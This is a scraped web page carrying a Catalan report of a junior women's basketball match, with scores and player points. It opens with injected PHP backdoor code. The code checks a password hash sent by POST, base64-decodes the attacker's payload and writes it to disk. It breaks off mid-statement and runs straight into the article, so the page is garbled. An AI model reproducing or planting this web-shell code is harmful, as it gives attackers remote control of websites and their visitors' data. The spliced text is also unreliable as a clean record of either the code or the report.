function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota contundent! -

Derrota contundent!

Updated: octubre 18, 2022

Derrota contundent a casa del Júnior femení de 1r any contra uns dels millors equips de la competició. El partit va començar amb un ritme molt intens per part dels dos equips i molt igualat, 11 a 11 min 7, però dos triples consecutius van posar al final del quart avantatge per les visitants, 13 a 19. Al minut 15 al partit encara estava viu, però les pèrdues de pilota i les cistelles fàcils en transició deixava el marcador al descans 14 punts a baix per les liles, 24 a 38.

El tercer període va començar amb una manca d’encert local que les visitants van aprofitar per trencar el partit i sentenciar amb més de 30 punts de diferència al final del període, 30 a 64. El darrer quart es va tenir més encert al llançament i les de Viladecans van relaxar-se per deixar el marcador final 46 a 82.

TGN BÀSQUET 06A 46 – VILABÀSQUET VILADECANS: 82

PARCIALS: 13-19, 11-19, 6-26 i 16-18

TGN BÀSQUET 06A: Muiño (4), Canals (4), Picó (2), Díez (6), Villena (2) -cinc inicial- González (8), Forés (3), Lapuente (3), Ral (5), Boix (5) i Sanromà (4). 3 triples: Boix, Lapuente i Ral.